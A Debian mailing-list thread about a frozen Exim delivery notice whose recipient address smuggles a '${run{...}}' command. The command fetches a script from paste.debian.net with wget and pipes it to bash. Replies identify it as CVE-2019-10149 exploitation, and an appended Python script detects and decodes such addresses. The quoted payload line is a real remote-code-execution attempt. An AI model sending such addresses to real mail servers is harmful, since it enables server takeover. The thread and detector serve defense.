• Misuse/Abuse

    From Paul Wise@21:1/5 to All on Tue Oct 13 15:00:02 2020
    On Tue, Oct 13, 2020 at 7:14 AM Knieling, Christian (IANM) wrote:

    I don't know if this message reaches the right persons, but someone may forward it. You may at least remove the files which are accessible on paste.debian.net.

    I forwarded this to the paste.d.n admin and they removed them.

    For future reference, the admin contact is listed on the left side of the site:

    https://paste.debian.net/

    --
    bye,
    pabs

    https://wiki.debian.org/PaulWise

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Daniel Leidert@21:1/5 to All on Tue Oct 13 16:20:02 2020
    On Tuesday, 13.10.2020, 08:51 +0200, Knieling, Christian (IANM) wrote:
    To whom this may concern,

    I got a system message from my mailer daemon lately. It contains

    -------------------------------- cut --------------------------------
    Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
    The sender is <>.

    The following address(es) have yet to be delivered:

    ${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-\thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbash\x22}}@ianm-mang.math.kit.edu:
    Too many "Received" headers - suspected mail loop
    -------------------------------- cut --------------------------------
    [..]
    I don't know if this message reaches the right persons, but someone may forward it. You may at least remove the files which are accessible on paste.debian.net.

    Clearly someone tries to run a command put as an address. Out of curiosity: Which kind of vulnerability are they trying to use here?

    Regards, Daniel
    --
    Regards,
    Daniel Leidert <dleidert@debian.org> | https://www.wgdd.de/
    GPG-Key RSA4096 / BEED4DED5544A4C03E283DC74BCD0567C296D05D
    GPG-Key ED25519 / BD3C132D8B3805D1808123AB7ACE00941E338C78

    If you like my work consider sponsoring me via https://www.patreon.com/join/dleidert

  • From Sven Hartge@21:1/5 to Daniel Leidert on Tue Oct 13 16:30:02 2020
    On 13.10.20 16:00, Daniel Leidert wrote:

    Clearly someone tries to run a command put as an address. Out of curiosity: Which kind of vulnerability are they trying to use here?

    Probably CVE-2019-10149

    https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt

    Regards,
    Sven.

  • From Martin Holub@21:1/5 to All on Tue Oct 13 16:40:02 2020
    On 13.10.20 at 16:00, Daniel Leidert wrote:

    On Tuesday, 13.10.2020, 08:51 +0200, Knieling, Christian (IANM) wrote:
    To whom this may concern,

    I got a system message from my mailer daemon lately. It contains

    -------------------------------- cut --------------------------------
    Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
    The sender is <>.

    The following address(es) have yet to be delivered:

    ${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-\thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbash\x22}}@ianm-mang.math.kit.edu:
    Too many "Received" headers - suspected mail loop
    -------------------------------- cut --------------------------------
    [..]
    I don't know if this message reaches the right persons, but someone may
    forward it. You may at least remove the files which are accessible on
    paste.debian.net.
    Clearly someone tries to run a command put as an address. Out of curiosity: Which kind of vulnerability are they trying to use here?

    Regards, Daniel

    Hi,

    I think some Exim4 exploit, see CVE-2019-10149 [1].

    Cheers,
    Martin

    [1] https://security-tracker.debian.org/tracker/CVE-2019-10149

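To triage a frozen-message notice like the one quoted in this thread, here is an added example (not code from any poster) that flags Exim expansion items such as `${run{` in an envelope recipient and decodes Exim's `\xHH` and `\t` escapes so an analyst can read what the attempted CVE-2019-10149 abuse would have run. The notice text, host and URL in the sample are constructed placeholders in the shape of the original.

```python
import re

# Exim expansion items that execute commands or read files/sockets; none of
# them belongs in an envelope address, which is the tell for CVE-2019-10149 abuse.
DANGEROUS_ITEMS = ("${run{", "${readsocket{", "${readfile{", "${perl{")

# \xHH and \t-style escapes that Exim decodes inside an expansion string
_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([tnr\\])")
_SIMPLE = {"t": "\t", "n": "\n", "r": "\r", "\\": "\\"}


def decode_exim_escapes(text: str) -> str:
    """Turn Exim string escapes back into the characters they stand for."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return _SIMPLE[m.group(2)]
    return _ESCAPE.sub(repl, text)


def find_expansion_abuse(notice: str) -> list:
    """Scan a frozen-message notice; return one triage record per suspicious recipient."""
    findings = []
    for raw in notice.splitlines():
        line = raw.strip().rstrip(":")  # Exim prints each pending address followed by ':'
        if "${" not in line or "@" not in line:
            continue
        local_part, _, domain = line.rpartition("@")
        hits = [item for item in DANGEROUS_ITEMS if item in local_part]
        decoded = decode_exim_escapes(local_part)
        cmd = re.search(r"\$\{run\{(.*)\}\}", decoded, re.S)
        findings.append({
            "domain": domain,
            "items": hits,
            "decoded_local_part": decoded,
            # naive whitespace split of the ${run{...}} argument, enough for triage
            "argv": cmd.group(1).split() if cmd else None,
        })
    return findings


# Constructed sample in the shape of the notice quoted above (host and URL are placeholders)
NOTICE = r"""Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
The sender is <>.

The following address(es) have yet to be delivered:

${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-\thttps\x3A\x2F\x2Fpaste\x2Eexample\x2Einvalid\x2Fpayload\t\x7C\tbash\x22}}@mail.example.invalid:
Too many "Received" headers - suspected mail loop
"""

if __name__ == "__main__":
    for f in find_expansion_abuse(NOTICE):
        print(f["domain"], f["items"], f["argv"])
```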